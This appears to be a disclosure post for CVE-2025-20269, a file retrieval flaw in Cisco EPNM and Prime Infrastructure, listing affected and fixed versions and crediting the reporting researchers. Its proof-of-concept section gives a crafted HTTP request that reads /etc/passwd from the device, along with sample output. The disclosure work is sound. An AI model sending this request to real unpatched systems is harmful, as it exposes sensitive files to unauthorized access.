CVE-2025-20269: Cisco EPNM and Prime Infrastructure Arbitrary File Retrieval
Posted on August 27, 2025 • 2 min read • 301 wordsCVE-2025-20269 is a vulnerability in the web-based management interface of Cisco Evolved Programmable Network Manager (EPNM) and Cisco Prime Infrastructure. It allows a remote, authenticated, low-privileged attacker to retrieve arbitrary files from the underlying file system by sending crafted HTTP requests. Cisco has released software updates to address the issue, and no workarounds are available.
Introduction
A vulnerability has been identified in the web-based management interface of Cisco Evolved Programmable Network Manager (EPNM) and Cisco Prime Infrastructure, which could allow a remote, authenticated, low-privileged attacker to retrieve arbitrary files from the underlying file system on an affected device.
This issue has been assigned CVE-2025-20269.
Technical description
The vulnerability is caused by insufficient input validation of specific HTTP requests sent to the management web interface.
An authenticated attacker could send specially crafted HTTP requests to read sensitive files from the affected device.
- Type of vulnerability: Arbitrary File Retrieval
- Authentication: required (low-privileged user)
- Impact: access to sensitive files on the system
- Workaround: not available
- Patch: released by Cisco
CVSS Score
| Vulnerability | CVSSv3.1 | Attack Vector |
|---|---|---|
| Sensitive Information Disclosure | 6.5 | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X |
Affected products
- Cisco EPNM: all releases up to 8.0 included
- Fixed in: 8.1.1
- Cisco Prime Infrastructure: all releases up to 3.9 and 3.10
- Fixed in: 3.10.6 Security Update 02
Impact
A successful exploit could allow the attacker to gain access to sensitive files on the affected system.
This access may compromise the confidentiality of data and provide information useful for further attacks.
Proof of Concept (PoC)
HTTP request
GET /webacs/Download?svc=multipath&downloadZipFileName=logFiles&downloadFileListWithPath=/etc/passwd& HTTP/1.1
Host: 127.0.0.1
Cookie: JSESSIONID=...;Expected output
The response contains a ZIP file with the file specified in the request.
root:X:0:0:root:/root:/bin/bash
bin:X:1:1:bin:/bin:/sbin/nologin
daemon:X:2:2:daemon:/sbin:/sbin/nologin
adm:X:3:4:adm:/var/adm:/sbin/nologinNotes
- The vulnerability was discovered in Cisco EPNM 7.1.3
- An authenticated low-privileged user is required
Mitigations
Cisco has released software updates that fix this vulnerability. No workarounds exist.
Administrators should upgrade to a non-vulnerable release, as indicated in the “Fixed Software” section of the official advisory.
References
- Cisco Security Advisory – cisco-sa-pi-epnm-TET4GxBX
- https://www.cve.org/CVERecord?id=CVE-2025-20269
- CVE-2025-20269 – NVD entry
Credits
Cisco thanks Paolo Grossetti and Matteo Piciarelli of Consulthink S.p.A. for responsibly reporting this vulnerability.